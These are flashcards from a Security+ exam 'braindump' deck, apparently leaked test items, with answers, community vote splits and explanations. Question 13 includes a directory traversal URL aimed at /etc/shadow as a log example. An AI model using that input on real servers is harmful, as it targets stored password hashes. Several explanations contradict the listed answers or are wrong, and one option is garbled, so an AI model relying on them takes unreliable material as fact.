Braindumps.351-400 Flashcards

1
Q

A new security engineer has started hardening systems. One of the hardening techniques the engineer is using involves disabling remote logins to the NAS. Users are now reporting the inability to use SCP to transfer files to the NAS, even though the data is still viewable from the users’ PCs. Which of the following is the MOST likely cause of this issue?

a. TFTP was disabled on the local hosts.
b. SSH was turned off instead of modifying the configuration file.
c. Remote login was disabled in the networkd.conf instead of using the sshd.conf.
d. Network services are no longer running on the NAS.

A

b. SSH was turned off instead of modifying the configuration file.

Here’s the reasoning:

Disabling remote logins to the NAS typically involves configuring SSH (Secure Shell) settings. SCP (Secure Copy Protocol) relies on SSH for secure file transfers. If SSH was turned off instead of properly modifying the SSH configuration file to disable remote logins while still allowing SCP transfers, users would be unable to use SCP to transfer files to the NAS.

Therefore, disabling SSH without correctly configuring the SSH configuration file to allow SCP could lead to the reported issue where users cannot use SCP for file transfers, even though they can still view data from their PCs. This aligns with the scenario described where remote logins were disabled but SCP functionality was inadvertently affected.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
2
Q

An enterprise has hired an outside security firm to conduct penetration testing on its network and applications. The firm has been given the documentation only available to the customers of the applications. Which of the following BEST represents the type of testing that will occur?

a. Bug bounty
b. Black-box
c. Gray-box
d. White-box

A

c. Gray-box testing.

Here’s why:

Black-box testing typically involves testing without any prior knowledge of the internal workings of the application or network. The tester starts with no information about the internal structure, code, or architecture.

White-box testing involves testing where the tester has full knowledge of the internal workings, including access to source code, architecture diagrams, and documentation.

Gray-box testing falls between black-box and white-box testing. In gray-box testing, the tester has partial knowledge of the internal workings of the application or network. In this scenario, the security firm has been provided with documentation available to customers of the applications. This partial knowledge allows the testers to conduct a more targeted and effective assessment, leveraging the information they have about the application's functionality, interfaces, and potentially some internal workings, while still simulating the perspective of an external attacker to some extent.

Therefore, the BEST representation of the type of testing that will occur in this scenario is Gray-box testing.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
3
Q

A network engineer and a security engineer are discussing ways to monitor network operations. Which of the following is the BEST method?

a. Disable Telnet and force SSH.
b. Establish a continuous ping.
c. Utilize an agentless monitor.
d. Enable SNMPv3 with passwords.

A

c. Utilize an agentless monitor.

Here’s why this is the best choice:

Agentless monitoring involves using monitoring tools that do not require the installation of agents or software on the monitored devices. This approach is generally preferred because it reduces the overhead associated with deploying and maintaining agents across numerous devices.

Agentless monitoring can gather information through protocols like SNMP (Simple Network Management Protocol), WMI (Windows Management Instrumentation), SSH (Secure Shell), and others, depending on the type of devices being monitored. It can provide comprehensive visibility into network performance, availability, and security posture without the need for agents.

Let’s briefly discuss why the other options are not as optimal:

a. Disable Telnet and force SSH: This is a security recommendation rather than a method for monitoring network operations. While it enhances security by using SSH instead of Telnet for remote access, it doesn't directly relate to network monitoring.

b. Establish a continuous ping: Continuous pinging can be useful for basic network connectivity testing, but it's not comprehensive enough for monitoring network operations in terms of performance, security, and other critical metrics.

d. Enable SNMPv3 with passwords: SNMPv3 is a secure version of SNMP that provides authentication and encryption. While SNMP can be useful for monitoring network devices, it requires careful configuration of authentication and encryption parameters to ensure security. However, it still involves deploying agents (SNMP agents) on the network devices, which is not agentless.
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
4
Q

A security analyst is looking for a solution to help communicate to the leadership team the severity levels of the organization’s vulnerabilities. Which of the following would BEST meet this need?

a. CVE
b. SIEM
c. SOAR
d. CVSS

A

d. CVSS (Common Vulnerability Scoring System)

Here’s why CVSS is the best choice:

CVSS (Common Vulnerability Scoring System) is a standardized system for assessing and communicating the severity of vulnerabilities. It assigns a score to vulnerabilities based on metrics such as exploitability, impact, and complexity, providing a numerical representation of the severity level.

CVSS scores range from 0 to 10, with higher scores indicating more severe vulnerabilities. This numerical scale helps leadership teams quickly understand the relative severity of vulnerabilities across the organization's systems and infrastructure.

CVE (Common Vulnerabilities and Exposures) is a dictionary of publicly known information security vulnerabilities and exposures but does not provide severity scoring directly. It lists vulnerabilities but does not quantify their severity in a standardized way.

SIEM (Security Information and Event Management) and SOAR (Security Orchestration, Automation, and Response) are tools and platforms used for monitoring, managing security events, and automating responses. While they are valuable for operational security, they do not directly provide a standardized severity scoring for vulnerabilities.

Therefore, CVSS is specifically designed to meet the need of communicating severity levels of vulnerabilities effectively to the leadership team, making it the most appropriate choice in this scenario.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
5
Q

A company is switching to a remote work model for all employees. All company and employee resources will be in the cloud. Employees must use their personal computers to access the cloud computing environment. The company will manage the operating system. Which of the following deployment models is the company implementing?

a. CYOD
b. MDM
c. COPE
d. VDI

A

d. VDI (Virtual Desktop Infrastructure)

Here’s why VDI is the most appropriate choice:

VDI (Virtual Desktop Infrastructure) allows employees to access a desktop environment hosted on a centralized server or cloud platform. This environment is managed by the company and provides a consistent desktop experience regardless of the device used by the employee.

In the scenario described, employees are using their personal computers (BYOD - Bring Your Own Device) to access the company's cloud computing environment. With VDI, the company manages the operating system and desktop environment centrally, ensuring security and control over corporate data and applications.

CYOD (Choose Your Own Device) typically involves employees selecting a device from a set of approved options provided by the company. This model does not align with employees using their personal computers.

MDM (Mobile Device Management) and COPE (Corporate-Owned, Personally-Enabled) are more focused on managing mobile devices (MDM) or company-provided devices (COPE), rather than personal computers accessing cloud resources.

Therefore, VDI is the deployment model implemented by the company in this scenario, allowing employees to securely access a managed desktop environment from their personal devices while keeping company data and applications centralized and controlled.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
6
Q

A security administrator needs to inspect in-transit files on the enterprise network to search for PII, credit card data, and classification words. Which of the following would be the BEST to use?

a. IDS solution
b. EDR solution
c. HIPS software solution
d. Network DLP solution

A

d. Network DLP (Data Loss Prevention) solution

Here’s why Network DLP is the most suitable choice:

Network DLP solutions are specifically designed to monitor and inspect data transmitted over the network in real-time. They can detect sensitive information based on predefined rules and policies, including PII and credit card numbers.

These solutions can analyze network traffic, including email, web traffic, file transfers, and other communications channels, to identify and prevent the unauthorized transmission of sensitive data.

IDS (Intrusion Detection System), EDR (Endpoint Detection and Response), and HIPS (Host-based Intrusion Prevention System) are important security tools but are typically focused on different aspects of security monitoring and threat detection, such as endpoint behavior, network intrusion attempts, or host-based security.

For the specific requirement of inspecting in-transit files for sensitive data across the enterprise network, a Network DLP solution is designed to provide the necessary visibility and control.

Therefore, Network DLP solution is the best option for the security administrator to use in order to inspect in-transit files and detect sensitive data like PII and credit card information on the enterprise network.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
7
Q

The Chief Executive Officer announced a new partnership with a strategic vendor and asked the Chief Information Security Officer to federate user digital identities using SAML-based protocols. Which of the following will this enable?

a. SSO
b. MFA
c. PKI
d. DLP

A

a. SSO (Single Sign-On)

Here’s an explanation:

SAML (Security Assertion Markup Language) is a protocol used for exchanging authentication and authorization data between parties, particularly between an identity provider (IdP) and a service provider (SP). It allows for the creation and management of federated identities.

Single Sign-On (SSO) is a user authentication process that permits a user to enter one set of credentials (such as a username and password) to access multiple applications and services. SSO relies heavily on SAML to enable this seamless authentication across different systems and organizations.

MFA (Multi-Factor Authentication) is a security system that requires more than one method of authentication from independent categories of credentials to verify the user's identity. While SAML can support MFA, federating identities specifically enables SSO.

PKI (Public Key Infrastructure) is a framework for creating a secure method for exchanging information based on public key cryptography. It is not directly related to federating identities with SAML.

DLP (Data Loss Prevention) refers to strategies and tools used to prevent sensitive data from being lost, misused, or accessed by unauthorized users. It is not directly related to federating identities with SAML.

Therefore, federating user digital identities using SAML-based protocols primarily enables Single Sign-On (SSO).

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
8
Q

An employee’s company account was used in a data breach. Interviews with the employee revealed:

*The employee was able to avoid changing passwords by using a previous password again.
*The account was accessed from a hostile, foreign nation, but the employee has never traveled to any other countries.

Which of the following can be implemented to prevent these issues from reoccurring? (Choose two.)

a. Geographic dispersal
b. Password complexity
c. Password history
d. Geotagging
e. Password lockout
f. Geofencing

A

c. Password history

Explanation: Enforcing password history ensures that users cannot reuse previous passwords, thereby enhancing password security.

f. Geofencing

Explanation: Geofencing restricts access based on geographic locations, preventing logins from unauthorized or unexpected regions, such as hostile foreign nations where the employee has never traveled.

These measures will address the problems of password reuse and unauthorized access from foreign locations.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
9
Q

A large industrial system’s smart generator monitors the system status and sends alerts to third-party maintenance personnel when critical failures occur. While reviewing the network logs, the company’s security manager notices the generator’s IP is sending packets to an internal file server’s IP. Which of the following mitigations would be BEST for the security manager to implement while maintaining alerting capabilities?

a. Segmentation
b. Firewall allow list
c. Containment
d. Isolation

A

(Community A : 81%, B : 19%)
a. Segmentation

Explanation: Network segmentation involves dividing the network into smaller, isolated segments to limit access and control traffic between different parts of the network. By segmenting the network, the security manager can ensure that the smart generator can still send alerts to third-party maintenance personnel while preventing it from communicating with internal file servers, thereby maintaining alerting capabilities and enhancing security.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
10
Q

Which of the following technologies is used to actively monitor for specific file types being transmitted on the network?

a. File integrity monitoring
b. Honeynets
c. Tcpreplay
d. Data loss prevention

A

d. Data loss prevention

Explanation: Data loss prevention (DLP) technologies are designed to monitor, detect, and block the transmission of specific types of sensitive information across a network. DLP can be configured to look for and take action on particular file types being transmitted, ensuring that sensitive data does not leave the network without proper authorization.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
11
Q

As part of the building process for a web application, the compliance team requires that all PKI certificates are rotated annually and can only contain wildcards at the secondary subdomain level. Which of the following certificate properties will meet these requirements?

a. HTTPS://.comptia.org, Valid from April 10 00:00:00 2021 - April 8 12:00:00 2022
b. HTTPS://app1.comptia.org, Valid from April 10 00:00:00 2021 - April 8 12:00:00 2022
c. HTTPS://
.app1.comptia.org, Valid from April 10 00:00:00 2021 - April 8 12:00:00 2022
d. HTTPS://*.comptia.org, Valid from April 10 00:00:00 2021 - April 8 12:00:00 2023

A

c. HTTPS://*.app1.comptia.org, Valid from April 10 00:00:00 2021 - April 8 12:00:00 2022

Explanation: This certificate meets the requirement of rotating annually and contains a wildcard only at the secondary subdomain level (*.app1.comptia.org). The other options either do not have the correct wildcard level or do not adhere to the annual rotation requirement.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
12
Q

A global pandemic is forcing a private organization to close some business units and reduce staffing at others. Which of the following would be BEST to help the organization’s executives determine their next course of action?

a. An incident response plan
b. A communication plan
c. A disaster recovery plan
d. A business continuity plan

A

d. A business continuity plan

Explanation: A business continuity plan (BCP) is designed to help organizations continue operating during and after a disruption, such as a global pandemic. It provides strategies for maintaining essential functions, managing reduced staffing, and making informed decisions on business operations. An incident response plan, communication plan, and disaster recovery plan are important but are more specific in scope and do not comprehensively address the wide-ranging impacts of a pandemic on business operations.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
13
Q

A cybersecurity analyst reviews the log files from a web server and sees a series of files that indicate a directory traversal attack has occurred. Which of the following is the analyst MOST likely seeing?

a. http://sample.url.com/
b. http://sample.url.com/someotherpageonsite/../../../etc/shadow
c. http://sample.url.com/select-from-database-where-password-null
d. http://redirect.sameple.url.sampleurl.com/malicious-dns-redirect

A

b. http://sample.url.com/someotherpageonsite/../../../etc/shadow

Explanation: A directory traversal attack occurs when an attacker uses sequences like ../ to move up the directory hierarchy and access files outside of the web server’s root directory. The URL http://sample.url.com/someotherpageonsite/../../../etc/shadow shows such a pattern, indicating an attempt to access the sensitive /etc/shadow file, which typically contains hashed passwords for users on Unix-based systems. This is a classic example of a directory traversal attack.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
14
Q

A candidate attempts to go to http://comptia.org but accidentally visits http://comptiia.org. The malicious website looks exactly like the legitimate website. Which of the following BEST describes this type of attack?

a. Reconnaissance
b. Impersonation
c. Typosquatting
d. Watering-hole

A

c. Typosquatting

Explanation: Typosquatting is a type of cyber attack where an attacker registers domain names that are similar to legitimate ones, often exploiting common typing errors. In this case, the attacker registered http://comptiia.org, which closely resembles http://comptia.org, to deceive users into thinking they are visiting the legitimate site.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
15
Q

The marketing department at a retail company wants to publish an internal website to the internet so it is reachable by a limited number of specific, external service providers in a secure manner. Which of the following configurations would be BEST to fulfil this requirement?

a. NAC
b. ACL
c. WAF
d. NAT

A

b. ACL

Explanation: An Access Control List (ACL) is the best configuration for this requirement because it allows the company to specify which external service providers can access the internal website. ACLs can be configured to permit or deny traffic based on IP addresses, ensuring that only a limited number of specific, external service providers can reach the website in a secure manner

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
16
Q

A retail executive recently accepted a job with a major competitor. The following week, a security analyst reviews the security logs and identifies successful logon attempts to access the departed executive’s accounts. Which of the following security practices would have addressed the issue?

a. A non-disclosure agreement
b. Least privilege
c. An acceptable use policy
d. Offboarding

A

d. Offboarding

Explanation: The issue of a departed executive’s accounts still being accessible could have been addressed through a proper offboarding process. Offboarding includes revoking access to company systems and data, ensuring that former employees can no longer log in or access sensitive information after they leave the organization. This would prevent the departed executive from logging in and protect the company from potential data breaches.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
17
Q

A network-connected magnetic resonance imaging (MRI) scanner at a hospital is controlled and operated by an outdated and unsupported specialized Windows OS. Which of the following is MOST likely preventing the IT manager at the hospital from upgrading the specialized OS?

a. The time needed for the MRI vendor to upgrade the system would negatively impact patients.
b. The MRI vendor does not support newer versions of the OS.
c. Changing the OS breaches a support SLA with the MRI vendor.
d. The IT team does not have the budget required to upgrade the MRI scanner.

A

b. The MRI vendor does not support newer versions of the OS.

Explanation: The most likely reason preventing the IT manager from upgrading the specialized OS is that the MRI vendor does not support newer versions of the operating system. Many medical devices, like MRI scanners, use specialized software that is tightly integrated with specific OS versions. If the vendor does not provide support for newer OS versions, upgrading could lead to compatibility issues, loss of functionality, and lack of vendor support for troubleshooting and maintenance. This situation is common in the medical industry, where devices often rely on specific configurations approved by regulatory bodies and the device manufacturers.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
18
Q

A company received a “right to be forgotten” request. To legally comply, the company must remove data related to the requester from its systems. Which of the following is the company MOST likely complying with?

a. NIST CSF
b. GDPR
c. PCI DSS
d. ISO 27001

A

b. GDPR

Explanation: The “right to be forgotten” is a provision under the General Data Protection Regulation (GDPR), which is a comprehensive data protection law in the European Union. GDPR gives individuals the right to request the deletion of their personal data from an organization’s systems under certain conditions. This request is also known as the right to erasure. Organizations subject to GDPR are legally required to comply with such requests, provided that no overriding lawful reason for retaining the data exists.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
19
Q

A security team suspects that the cause of recent power consumption overloads is the unauthorized use of empty power outlets in the network rack. Which of the following options will mitigate this issue without compromising the number of outlets available?

a. Adding a new UPS dedicated to the rack
b. Installing a managed PDU
c. Using only a dual power supplies unit
d. Increasing power generator capacity

A

b. Installing a managed PDU

Explanation: A managed Power Distribution Unit (PDU) allows for better monitoring and control of power usage in a network rack. It provides detailed insights into power consumption at the outlet level, enabling the identification and prevention of unauthorized use of power outlets. This solution does not compromise the number of available outlets and helps to manage and balance the power load efficiently.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
20
Q

An engineer wants to inspect traffic to a cluster of web servers in a cloud environment. Which of the following solutions should the engineer implement?

a. CASB
b. WAF
c. Load balancer
d. VPN

A

(Community B 69%, A 24%)
b. WAF (Web Application Firewall)

CASBs primarily focus on securing and controlling the use of cloud services and data, while a Web Application Firewall (WAF) is specifically designed to protect web applications and inspect traffic to web servers for security threats.

Explanation: A Web Application Firewall (WAF) is specifically designed to protect web applications by filtering and monitoring HTTP traffic between a web application and the Internet. It can inspect incoming traffic to the web servers, detect and filter out malicious requests, and provide detailed logging and monitoring capabilities. This helps ensure the security and integrity of the web servers in the cloud environment.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
21
Q

A security analyst needs to implement an MDM solution for BYOD users that will allow the company to retain control over company emails residing on the devices and limit data exfiltration that might occur if the devices are lost or stolen. Which of the following would BEST meet these requirements? (Choose two.)

a. Full device encryption
b. Network usage rules
c. Geofencing
d. Containerization
e. Application approve list
f. Remote control

A

(Braindump : d. Containerization, f. Remote control)

Case for D & F :
While Full Disk Encryption is a valuable security measure, it primarily protects data at rest and would not necessarily prevent data exfiltration if the device is unlocked1.

Geofencing is a feature that triggers an action when a mobile device enters a set location, which can be useful for managing devices in specific locations but does not directly prevent data exfiltration3.

In summary, while all these features contribute to the overall security of a device, the Remote Control feature of MDM is the most directly relevant to limiting data exfiltration in the event of a device being lost or stol

(Community AD : 51%, DF 36%)

ChatGPT : D & F

d. Containerization
f. Remote control
Explanation:

Containerization:
    Purpose: Containerization allows the separation of corporate data and personal data on BYOD devices. This ensures that company emails and other corporate data are stored in a secure, isolated environment.
    Benefit: This method protects corporate data and can enforce policies specifically for the container without affecting the personal data on the device. It also simplifies the process of wiping only the corporate data if the device is lost or stolen.

Remote control:
    Purpose: Remote control allows the security team to manage and interact with the device remotely.
    Benefit: This capability is crucial for performing actions such as remote wipe or lock if a device is lost or stolen, thus preventing unauthorized access to company emails and other sensitive data.

Additional Context:

Full device encryption: While this helps protect data at rest, it does not specifically address the control over company emails or selective data exfiltration prevention.
Network usage rules: These can help in managing data usage but do not specifically control email data or offer capabilities for lost/stolen device scenarios.
Geofencing: This can be useful for restricting device usage based on location but does not directly address email control or data exfiltration.
Application approve list: This can prevent the installation of unauthorized applications but does not specifically manage or protect company emails.

Therefore, containerization and remote control are the best choices to meet the specified requirements.

22
Q

A security administrator is evaluating remote access solutions for employees who are geographically dispersed. Which of the following would provide the MOST secure remote access? (Choose two.)

a. IPSec
b. SFTP
c. SRTP
d. LDAPS
e. S/MIME
f. SSL VPN

A

(Community : AF 75%, AE 17%)

a. IPSec (Internet Protocol Security): IPSec provides strong security features for IP communications by authenticating and encrypting each IP packet in a communication session. It ensures data integrity, confidentiality, and authenticity, making it a robust choice for securing remote access VPN connections.

f. SSL VPN (Secure Sockets Layer Virtual Private Network): SSL VPNs use SSL/TLS protocols to provide secure remote access to internal network resources. They are designed to securely transport corporate data over the public internet by encrypting the entire communication session between the client and the VPN gateway. SSL VPNs are widely used for their ease of deployment and strong encryption capabilities.

These two options, IPSec and SSL VPN, are widely recognized for their ability to provide secure remote access over the internet. They offer encryption, authentication, and integrity protection, making them suitable for ensuring the security of communications between geographically dispersed employees and the corporate network.

23
Q

A malicious actor recently penetrated a company’s network and moved laterally to the data center. Upon investigation, a forensics firm wants to know what was in the memory on the compromised server. Which of the following files should be given to the forensics firm?

a. Security
b. Application
c. Dump
d. Syslog

A

c. Dump

A memory dump (often referred to as a memory image or core dump) is a snapshot of the contents of the server’s volatile memory (RAM) at a specific point in time. It contains a copy of the active processes, data structures, and potentially other details like network connections, opened files, and other volatile system state information. Analyzing a memory dump can provide insights into the activities that occurred on the server, including details about the actions taken by the malicious actor.

The other options are less likely to contain the detailed memory contents needed for forensic investigation:

a. Security: Typically refers to security-related configurations, logs, or policies.
b. Application: Contains information related to specific applications running on the server, but not necessarily memory contents.
d. Syslog: Contains logs generated by the system and applications, which are valuable for understanding events and activities but do not provide direct memory contents.

Therefore, the correct file to provide to the forensics firm for investigating what was in the memory on the compromised server is c. Dump (memory dump).

24
Q

A company is looking to migrate some servers to the cloud to minimize its technology footprint. The company has a customer relationship management system on premises. Which of the following solutions will require the LEAST infrastructure and application support from the company?

a. SaaS
b. IaaS
c. PaaS
d. SDN

A

a. SaaS (Software as a Service)

Here’s why SaaS is the correct choice:

SaaS delivers software applications over the internet, typically on a subscription basis. The applications are managed by a third-party provider (cloud service provider), which handles maintenance, updates, security, and infrastructure management.

With SaaS, the company does not need to manage or control the underlying cloud infrastructure (servers, networking, storage) or the software application itself. The responsibility for infrastructure support, application maintenance, and security patches lies with the SaaS provider.

This model is ideal for minimizing the company's technology footprint because it offloads almost all infrastructure and application support tasks to the SaaS provider. The company primarily focuses on using the application and managing user access and configurations rather than maintaining server hardware, operating systems, or application software.

In contrast, let’s briefly discuss the other options:

b. IaaS (Infrastructure as a Service): Provides virtualized computing resources over the internet. The company manages applications, data, runtime, and middleware, but the cloud provider manages virtualization, servers, storage, and networking.

c. PaaS (Platform as a Service): Provides a platform allowing customers to develop, run, and manage applications without the complexity of building and maintaining the infrastructure. The cloud provider manages the platform infrastructure and the company manages the applications and data.

d. SDN (Software-Defined Networking): Refers to the virtualization of network services, which can optimize and manage network resources dynamically. It is not directly related to minimizing infrastructure or application support for CRM systems.

Therefore, a. SaaS is the option that requires the least infrastructure and application support from the company when migrating a CRM system to the cloud.

25
Q

A network administrator needs to determine the sequence of a server farm’s logs. Which of the following should the administrator consider? (Choose two.)

a. Chain of custody
b. Tags
c. Reports
d. Time stamps
e. Hash values
f. Time offset

A

(Community DF 90%)

d. Time stamps
f. Time offset

d. Time stamps: Time stamps indicate when each log entry was recorded. By analyzing time stamps, the administrator can sequence the events in chronological order, which is crucial for understanding the timeline of events and identifying any anomalies or suspicious activities.

f. Time offset: Time offset refers to the difference in time between different logs or systems. It’s important to consider because servers within a farm may not all be synchronized perfectly. Understanding and adjusting for time offsets helps in accurately correlating events across different servers or logs within the farm.

Here’s a brief explanation of the other options:

a. Chain of custody: Chain of custody refers to the chronological documentation or paper trail that records the sequence of custody, control, transfer, analysis, and disposition of physical or electronic evidence. While important in forensic investigations, it doesn't directly aid in determining the sequence of server logs.

b. Tags: Tags can be metadata or labels associated with log entries, but they do not inherently determine the sequence of logs. They provide additional information for categorization and filtering.

c. Reports: Reports are summaries or analyses derived from logs but do not directly determine the sequence of logs themselves.

e. Hash values: Hash values are cryptographic representations of data for integrity verification but are not used to determine the sequence of logs.

Therefore, the most relevant considerations for determining the sequence of a server farm’s logs are d. Time stamps and f. Time offset.

(Braindump : d. Time stamps, e. Hash values)

26
Q

Which of the following is the BEST reason to maintain a functional and effective asset management policy that aids in ensuring the security of an organization?

a. To provide data to quantify risk based on the organization’s systems
b. To keep all software and hardware fully patched for known vulnerabilities
c. To only allow approved, organization-owned devices onto the business network
d. To standardize by selecting one laptop model for all users in the organization

A

(Community : A 47%, B 38%, C 15%)
a. To provide data to quantify risk based on the organization’s systems.

Here’s why:

Quantifying risk: Asset management policies help identify and catalog all hardware and software assets within the organization. This information is crucial for assessing the organization's overall security posture and identifying vulnerabilities that could be exploited. By understanding the scope and nature of its assets, an organization can effectively prioritize and allocate resources to manage and mitigate risks.

Let’s briefly evaluate the other options:

b. To keep all software and hardware fully patched for known vulnerabilities: While this is important and often a part of asset management practices, it focuses more on operational security and vulnerability management rather than the comprehensive risk assessment provided by asset management.

c. To only allow approved, organization-owned devices onto the business network: This relates more to network access control and device management policies rather than asset management, although asset management may support this effort by identifying unauthorized devices.

d. To standardize by selecting one laptop model for all users in the organization: This aims for consistency and simplicity in management but does not directly address the broader security benefits of asset management, such as risk assessment and mitigation.

Therefore, option a. To provide data to quantify risk based on the organization’s systems is the best reason because it highlights how asset management policies contribute directly to understanding and managing security risks across the organization.

27
Q

A security administrator, who is working for a government organization, would like to utilize classification and granular planning to secure top secret data and grant access on a need-to-know basis. Which of the following access control schemas should the administrator consider?

a. Mandatory
b. Rule-based
c. Discretionary
d. Role-based

A

a. Mandatory

Mandatory Access Control (MAC) is designed precisely for situations where strict access control is needed based on data sensitivity and security clearances. Here’s why it’s suitable:

Classification and granular planning: MAC enforces access control policies based on data classifications (e.g., top secret, secret, confidential) and security labels attached to subjects (users, processes) and objects (files, resources). This aligns perfectly with the requirement to secure top secret data through precise classification and planning.

Need-to-know basis: MAC ensures that access is granted strictly on a need-to-know basis, meaning users can only access data if they have the necessary security clearance and explicit authorization, regardless of the discretion of data owners or administrators.

In contrast, let’s briefly clarify the other options:

b. Rule-based: Rule-based access control (RBAC) defines access control rules based on policies but does not enforce the strict hierarchical control and labeling required for top secret data in government settings.

c. Discretionary: Discretionary Access Control (DAC) grants access rights based on the discretion of the data owner or resource custodian. It does not provide the level of control needed for top secret data where access must be strictly controlled based on security clearances and classifications.

d. Role-based: Role-Based Access Control (RBAC) assigns permissions to users based on their roles within an organization. While useful for managing permissions at a broader organizational level, it does not enforce the strict labeling and hierarchical access control needed for top secret data in government contexts.

Therefore, a. Mandatory Access Control (MAC) is the most appropriate access control schema for the security administrator to consider in this scenario to ensure that top secret data is secured and access is granted on a need-to-know basis according to strict classification and planning principles.

28
Q

An organization is outlining data stewardship roles and responsibilities. Which of the following employee roles would determine the purpose of data and how to process it?

a. Data custodian
b. Data controller
c. Data protection officer
d. Data processor

A

b. Data controller

Here’s why:

Data controller: The data controller is responsible for determining the purposes for which personal data is processed and the means by which it is processed. This role decides why certain data is collected, how it will be used, and the legal basis for its processing. The data controller ensures that processing activities comply with data protection regulations and organizational policies.

In contrast, let’s clarify the other options:

a. Data custodian: The data custodian is responsible for the storage, maintenance, and protection of data according to the policies set by the data controller. They implement and manage the technical aspects of data management, but they do not determine the purposes or methods of data processing.

c. Data protection officer: The Data Protection Officer (DPO) is responsible for overseeing data protection strategy and implementation to ensure compliance with data protection laws and regulations. They advise on data protection impact assessments (DPIAs) and monitor compliance, but they typically do not determine the purpose of data processing.

d. Data processor: The data processor processes personal data on behalf of the data controller, following the controller's instructions. They do not determine the purposes or methods of processing unless instructed by the data controller.

Therefore, b. Data controller is the role within an organization that determines the purpose of data and how to process it, making it essential in data stewardship roles and responsibilities.

29
Q

Multiple beaconing activities to a malicious domain have been observed. The malicious domain is hosting malware from various endpoints on the network. Which of the following technologies would be BEST to correlate the activities between the different endpoints?

a. Firewall
b. SIEM
c. IPS
d. Protocol analyzer

A

b. SIEM (Security Information and Event Management)

Here’s why SIEM is the most suitable choice:

Centralized monitoring: SIEM solutions aggregate and analyze log data from various sources across the network, including endpoints, firewalls, servers, and other network devices. This allows for comprehensive visibility into network activities, including beaconing activities to malicious domains.

Correlation capabilities: SIEM systems are designed to correlate events and activities across different endpoints and network devices. They can detect patterns and anomalies that indicate coordinated or widespread malicious activities, such as multiple endpoints communicating with the same malicious domain.

Alerting and reporting: SIEMs provide real-time monitoring, alerting, and reporting capabilities, which are crucial for identifying and responding to security incidents promptly. In the case of beaconing activities, SIEM can generate alerts based on predefined rules or anomaly detection algorithms.

In contrast, let’s briefly consider the other options:

a. Firewall: While firewalls provide network security by monitoring and controlling incoming and outgoing traffic, they typically do not have the extensive logging, correlation, and analysis capabilities necessary to track and correlate activities across multiple endpoints.

c. IPS (Intrusion Prevention System): IPS systems focus on identifying and blocking suspicious network traffic and activities. While they can detect some malicious activities, they do not provide the holistic endpoint visibility and correlation capabilities offered by SIEM.

d. Protocol analyzer: Protocol analyzers (or packet analyzers) capture and analyze network traffic at a packet level, which can be useful for deep inspection of network communications. However, they lack the centralized logging and correlation features needed to effectively correlate activities across different endpoints in real-time.

Therefore, b. SIEM is the best technology for correlating activities between different endpoints, especially in the scenario of observing multiple beaconing activities to a malicious domain hosting malware.

30
Q

Which of the following types of controls is a turnstile?

a. Physical
b. Detective
c. Corrective
d. Technical

A

The type of control that a turnstile represents is:

a. Physical

Here’s why:

Physical controls are measures implemented physically to protect resources, personnel, and facilities. Turnstiles are physical barriers or access control devices that regulate or restrict entry to a specific area or facility. They physically prevent unauthorized individuals from passing through unless they have the appropriate authorization (e.g., a valid ticket, badge, or access card).

In contrast, let’s briefly define the other types of controls:

Detective controls are designed to detect and identify security incidents or anomalies after they have occurred. Examples include log monitoring, security cameras, and intrusion detection systems (IDS).

Corrective controls are implemented to mitigate the impact of security incidents and restore systems to normal operations. Examples include incident response procedures, backup and recovery plans, and system restoration processes.

Technical controls encompass security measures that are implemented using technology. This includes firewalls, encryption, access control systems (like turnstiles), antivirus software, and authentication mechanisms.

Therefore, the correct answer is a. Physical, as turnstiles are physical controls used for access regulation.

31
Q

Users report access to an application from an internal workstation is still unavailable to a specific server, even after a recent firewall rule implementation that was requested for this access. ICMP traffic is successful between the two devices. Which of the following tools should the security analyst use to help identify if the traffic is being blocked?

a. nmap
b. tracert
c. ping
d. ssh

A

a. nmap

nmap (Network Mapper) is a versatile network scanning tool that can be used to discover hosts and services on a computer network. In this context, it can help determine if the specific server is reachable from the internal workstation and if specific ports necessary for application access are open or blocked.

Here’s how nmap can assist:

Port scanning: nmap can perform port scans to check which ports on the server are open and accessible from the workstation. If the firewall rule was intended to allow access to specific ports, nmap can verify if these ports are indeed reachable.

Service detection: nmap can identify the services running on the server and their respective ports. This helps in troubleshooting whether the expected application service is accessible and responsive.

In contrast, let’s briefly discuss the other options:

b. tracert (traceroute): Traceroute shows the path that packets take from the source to the destination, displaying each hop along the way. While useful for diagnosing routing issues, it doesn't directly verify if traffic is being blocked by a firewall.

c. ping: Ping checks the basic connectivity between two devices by sending ICMP echo requests and receiving ICMP echo replies. While it confirms basic connectivity (as noted in the question), it doesn't provide information on whether specific ports are being blocked.

d. ssh: Secure Shell (SSH) is a protocol used for securely accessing a remote server. It is not relevant in this context for diagnosing firewall blocking issues.

Therefore, a. nmap is the appropriate tool for the security analyst to use to help identify if the traffic is being blocked by the firewall after the recent rule implementation.

32
Q

As part of annual audit requirements, the security team performed a review of exceptions to the company policy that allows specific users the ability to use USB storage devices on their laptops. The review yielded the following results:

*The exception process and policy have been correctly followed by the majority of users.
*A small number of users did not create tickets for the requests but were granted access.
*All access had been approved by supervisors.
*Valid requests for the access sporadically occurred across multiple departments.
*Access, in most cases, had not been removed when it was no longer needed.

Which of the following should the company do to ensure that appropriate access is not disrupted but unneeded access is removed in a reasonable time frame?

a. Create an automated, monthly attestation process that removes access if an employee’s supervisor denies the approval.
b. Remove access for all employees and only allow new access to be granted if the employee’s supervisor approves the request.
c. Perform a quarterly audit of all user accounts that have been granted access and verify the exceptions with the management team.
d. Implement a ticketing system that tracks each request and generates reports listing which employees actively use USB storage devices.

A

(Community : C 65%, A 32%)

